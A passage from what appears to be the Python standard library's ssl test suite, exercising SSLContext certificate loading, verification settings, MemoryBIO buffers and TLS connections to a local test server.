self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_idna_in_server_hostname(self):
# Note: this test is testing some code that probably shouldn't exist
# in the first place, so if it starts failing at some point because
# you made the ssl module stop doing IDNA decoding then please feel
# free to remove it. The test was mainly added because this case used
# to cause memory corruption (see bpo-30594).
ctx = ssl.create_default_context()
with self.assertRaises(UnicodeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="xn--.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
